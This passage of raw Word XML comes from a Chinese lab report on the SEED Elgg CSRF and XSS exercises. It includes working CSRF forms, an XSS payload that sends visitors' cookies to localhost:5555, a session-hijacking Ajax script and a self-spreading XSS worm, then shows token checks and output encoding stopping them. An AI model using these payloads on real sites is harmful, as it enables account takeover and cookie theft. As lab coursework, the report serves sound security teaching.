        <w:t>实验目的</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="2C931761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本实验目的是通过发起跨站请求伪造攻击(CSRF或XSRF)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进一步理解跨站请求伪造攻击原理和防御措施。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1917E47E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跨站请求伪造攻击一般涉及受害者、可信站点和恶意站点。受害者在持有与受信任的站点的会话(session)的情况下访问了恶意站点。恶意站点通过将受害者在受信任站点的session中注入 HTTP 请求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从而冒充受害者发出的请求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这些请求可能导致受害者遭受损失。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601F5329">
      <w:pPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="30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在本实验中,需要对社交网络 Web 应用程序发起跨站请求伪造攻击。重现攻击后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需要通过重新开启防御措施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对比开启防御后的攻击效果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A60D435">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="600" w:leftChars="0" w:hanging="600" w:firstLineChars="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc1253096822"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验内容、步骤及结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="2335996C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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>基于</w:t>
      </w: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GET请求的CSRF攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7B3B79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分析添加好友请求，得到添加samy为好友的GET请求为http://www.csrflabelgg.com/action/friends/add?friend=45，构造恶意网站使alice访问URL时自动添加samy为好友，index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C8CA2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html&gt;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14FBBFF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&lt;body&gt;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685FB75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&lt;img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src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"http://www.csrflabelgg.com/action/friends/add?friend=45"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00503D9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&lt;/body&gt;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4453AAC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&lt;/html&gt;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1AB1AA9E">
      <w:pPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="30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登陆alice账号，访问邮件中的URL，自动添加samy为alice好友，如图3-1所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D164C36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5177155" cy="588645"/>
            <wp:effectExtent l="9525" t="9525" r="1397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58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237E7F">
      <w:p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3-1 基于GET请求的CSRF攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E64A4B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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>基于</w:t>
      </w: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POST请求的CSRF攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106A2FD3">
      <w:pPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="30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分析修改profile描述的POST请求，构造恶意网站使alice访问URL时自动修改profile描述为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Samy is my hero</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFDD49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html&gt;&lt;body&gt;&lt;script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type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"text/javascript"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03EBF1C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function post(url,fields) {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A03093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031D065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var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document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.createElement("form");  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F815CE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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C3DAB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p.action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url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 w14:paraId="107C74A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p.innerHTML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fields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 w14:paraId="2C15F47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p.target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"_self"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 w14:paraId="27B555A1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p.method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"post"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 w14:paraId="6CB0986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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678D079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document.body.appendChild(p);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BB430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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4FFEB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p.submit();  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552B6F0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 w14:paraId="2531A3E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function csrf_hack() {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE8EE61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var fields;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A10CC2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fields += "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&lt;input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type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'hidden'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'description'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'Samy ismy hero'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";  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A131BA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fields += "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&lt;input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type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'hidden'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'guid'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'42'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";  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D7968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var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url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"http://www.csrflabelgg.com/action/profile/edit"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 w14:paraId="6129570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post(url,fields);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EA25F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 w14:paraId="3021204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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238DD5D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window.onload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() { csrf_hack();}  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369B831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&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;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4BB8F0A4">
      <w:pPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="30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登陆alice账号，访问邮件中的URL，自动修改profile描述，如图3-2所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7538D7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4221480" cy="1369695"/>
            <wp:effectExtent l="9525" t="9525" r="17145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36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3C3B17">
      <w:pPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/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3-2 基于POST请求的CSRF攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F09064E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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实现</w:t>
      </w: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login CSRF攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B26D4A5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分析用户登陆的POST请求，构造恶意网站使alice访问URL时自动登陆samy账号，index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52338EC8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html&gt;&lt;body&gt;&lt;script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type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"text/javascript"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</w:p>
    <w:p w14:paraId="22E099C2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function post(url,fields) {    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6B2091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</w:p>
    <w:p w14:paraId="55A9E67D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var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document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.createElement("form");    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EB9A3C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</w:p>
    <w:p w14:paraId="25821D9E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p.action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url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;    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AC24E9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p.innerHTML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fields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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E91EF4F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p.target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"_self"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;    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD58060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p.method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"post"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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5E3BFA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</w:p>
    <w:p w14:paraId="634D46F1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document.body.appendChild(p);    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CF43C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</w:p>
    <w:p w14:paraId="1CA527E4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p.submit();    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7D9F73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}    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A191D73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function csrf_hack() {    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C39B94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var fields;    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FD30C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fields += "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&lt;input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type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'hidden'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'password'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'seedsamy'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";    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26432D6F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fields += "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&lt;input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type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'hidden'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'username'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'samy'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";    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697AF0B0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var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url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"http://www.csrflabelgg.com/action/login"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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7015C68A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post(url,fields);    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A34D02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}    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4842B0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</w:p>
    <w:p w14:paraId="52EDF25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window.onload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() { csrf_hack();}    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366D149D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&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;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</w:p>
    <w:p w14:paraId="0D803452">
      <w:pPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="30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登陆alice账号，访问邮件中的URL，自动切换登陆到samy账号，如图3-3所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35469481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3985895" cy="1240790"/>
            <wp:effectExtent l="9525" t="9525" r="24130" b="2603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240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7DA804">
      <w:pPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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3-3 login CSRF攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC88A40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CSRF防御策略</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0062BF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进入目录/var/www/CSRF/Elgg/vendor/elgg/elgg/engine/classes/Elgg并在ActionsService.php文件中找到函数public function gatekeeper($action){，并注释此处“return true”这条语句：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A88545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8200"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/**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 w14:paraId="110968F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8"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t> * @see action_gatekeeper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 w14:paraId="7665EA7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8"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> * @access 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 w14:paraId="33098C9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8"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>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61A7225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gatekeeper($action) {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622A508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8"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>// return true;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5BF585D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......  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F1F04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}  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB7D155">
      <w:pPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="30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在打开上面的对策之后,再次尝试前两个任务的CSRF攻击，效果如图3-4所示，攻击失败，并显示大量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Form is missing __token or __ts fields</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，提示缺少秘密令牌。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C810E39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3406775" cy="1483995"/>
            <wp:effectExtent l="9525" t="9525" r="12700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48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56E61">
      <w:pPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50"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图3-4 CSRF防御策略</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A8361C">
      <w:pPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="30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前两个任务的CSRF攻击均未成功，页面返回更新并提示错误，成功防御了CSRF攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB0C627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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>从受害者机器上盗取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73818A18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设计带有合理的请求参数的脚本到 Samy 的个人介绍中（如图3-5所示）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1663035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&lt;script&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605AC40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document.write(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'&lt;img src=http://localhost:5555?c='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+ escape(document.cookie)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 &gt;'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 w14:paraId="6A11DD4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&lt;/script&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5B584A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4385310" cy="692150"/>
            <wp:effectExtent l="9525" t="9525" r="24765" b="222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69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2B39C">
      <w:pPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50"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图3-5 注入XSS代码到简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4B1292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登陆alice账户访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Members</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>界面，发现samy简介描述为错误的图片，查看HTTP请求发现alice的cookie被发送到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>localhost:5555</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，如图3-6所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AD8381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4126230" cy="1569720"/>
            <wp:effectExtent l="9525" t="9525" r="17145" b="2095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569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75CB32">
      <w:p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3-6 XSS攻击cookie泄漏</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0349A552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使用nc监听5555端口，成功获取到泄漏的cookie，如图3-7所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5534BDDA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4268470" cy="1070610"/>
            <wp:effectExtent l="9525" t="9525" r="27305" b="2476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A3463D">
      <w:p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3-7 XSS攻击cookie泄漏</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270FA7C6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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Ajax</w:t>
      </w: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脚本自动发起会话劫持</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC3DFC2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设计如下js代码写入到samy个人介绍的about me中，以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Edit HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>写入：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9B5952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&lt;script type=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"text/javascript"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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A72981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window.onload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() {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4483A303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elgg_ts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"&amp;__elgg_ts="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+ elgg.security.token.__elgg_ts;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AE6837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elgg_token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"&amp;__elgg_token="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+ elgg.security.token.__elgg_token;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FD8D9F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guid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"&amp;guid="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+ elgg.session.user.guid;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D79938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name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"&amp;name="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+ elgg.session.user.name;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2758FA00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"&amp;description=Samy is my hero."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"&amp;accesslevel[description]=2"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 w14:paraId="01F80B11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content = elgg_token + elgg_ts + name + desc + guid;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF44A9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sendurl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"http://www.xsslabelgg.com/action/profile/edit"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 w14:paraId="517C5399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 w14:paraId="0A400D11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(elgg.session.user.guid != 47) {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F99DFDB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Ajax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 w14:paraId="5D9B373B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    Ajax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XMLHttpRequest();  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388A1318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    Ajax.open(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"POST"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,sendurl,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 w14:paraId="7F791080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    Ajax.setRequestHeader(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"Content-Type"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"application/x-www-form-urlencoded"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 w14:paraId="5EABEA16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    Ajax.send(content);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022B467A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}  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684BF12B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}  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E91898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&lt;/script&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EDBB92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登陆alice账户访问samy主页，发现alice主页简介被自动修改为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Samy is my hero</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，分析HTTP请求发现有POST请求修改alice主页简介，如图3-8所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C5C98E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1898015" cy="1031240"/>
            <wp:effectExtent l="9525" t="9525" r="16510" b="2603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rcRect r="35092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031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1775" cy="1033145"/>
            <wp:effectExtent l="9525" t="9525" r="19050" b="2413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33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ADF26B">
      <w:pPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="300" w:lineRule="auto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3-8 XSS会话劫持</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BF2EF4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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>构造</w:t>
      </w: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XSS蠕虫</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3144CCB5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与3.2.6相似，设计如下js代码写入到samy个人介绍的about me中，以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Edit HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>写入，代码将自身修改为访问者的简介，实现蠕虫传播：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D5DAF0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&lt;script id=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"worm"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type=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"text/javascript"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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4211AF77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window.onload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() {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C89DB2C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headerTag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"&lt;script id=\"worm\" type=\"text/javascript\"&gt;"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 w14:paraId="623B141C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jscodeTag = document.getElementById(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"worm"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).innerHTML;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA30096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footerTag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"&lt;/"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"script&gt;"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3F5FBC64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wormcode = encodeURIComponent(headerTag+jscodeTag+footerTag);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DF9FB9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elgg_ts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"&amp;__elgg_ts="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+ elgg.security.token.__elgg_ts;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D7D99E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elgg_token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"&amp;__elgg_token="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+ elgg.security.token.__elgg_token;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7325B8BB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guid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"&amp;guid="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+ elgg.session.user.guid;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE90992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name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"&amp;name="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+ elgg.session.user.name;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5AC1CB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"&amp;description=Samy is my hero."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+ wormcode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"&amp;accesslevel[description]=2"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 w14:paraId="29F4F64A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content = elgg_token + elgg_ts + name + desc + guid;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2F3896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sendurl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"http://www.xsslabelgg.com/action/profile/edit"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 w14:paraId="3BED1628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(elgg.session.user.guid != 47) {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1134C2B0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Ajax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 w14:paraId="2310D7CB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    Ajax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XMLHttpRequest();  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5539316C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    Ajax.open(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"POST"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,sendurl,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 w14:paraId="470CC24E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    Ajax.setRequestHeader(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"Content-Type"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"application/x-www-form-urlencoded"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 w14:paraId="5709D97C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    Ajax.send(content);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B1390B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}  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209A161A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 w14:paraId="6E332630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&lt;/script&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5679DD3D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登陆alice账户访问samy主页，发现alice主页简介被自动修改为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Samy is my hero</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，编辑查看alice的about me，发现内容被修改为蠕虫代码，如图3-9所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689ACA59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5267960" cy="1955165"/>
            <wp:effectExtent l="9525" t="9525" r="18415" b="1651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5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3D6CCE">
      <w:p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3-9 XSS蠕虫传播</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535D4CFF">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:leftChars="0" w:hanging="1134" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>XSS防御策略</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F56FFD7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管理员administration账号登录到应用程序，并转到Account→administration（顶部菜单）→plugins（在右侧面板上），然后在下拉菜单中选择security and spam点击filter。在下面找到HTMLawed 1.8插件。点击Activate来开启策略。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9CB787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除了Elgg中的HTMLawed 1.8安全插件外，还有另一种PHP内置的方法htmlspecialchars()，用于对用户输入中的特殊字符进行编码，例如将“&lt;”转换为&amp;lt，“&gt;”转换&amp;gt等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A309A5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需要到/var/www/XSS/Elgg/vendor/elgg/elgg/views/default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>output/目录并找到调用htmlspecialchars()函数的文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>php、url.php、dropdown.php、email.php。在每个文件中取消注释相应的htmlspecialchars()函数调用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5564714E">
      <w:pPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="30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完成上述修改后，继续进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3.2.7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中的XSS蠕虫攻击，登陆alice访问samy主页，发现可以直接观看到samy的about me源码，而未遭到XSS蠕虫攻击，如图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3-10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>所示。成功防御了XSS攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628F27D5">
      <w:p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5274310" cy="3211195"/>
            <wp:effectExtent l="9525" t="9525" r="12065" b="1778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91A253">
      <w:pPr>
        <w:spacing w:before="156" w:beforeLines="50"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3-10 XSS攻击防御</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37267D6D">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="600" w:leftChars="0" w:hanging="600" w:firstLineChars="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc1150502548"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验中的问题、心得和建议</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="0446EFAA">
      <w:pPr>
        <w:spacing w:before="156" w:beforeLines="50" w:after="156" w:afterLines="50" w:line="30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在本次实验中，学习了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
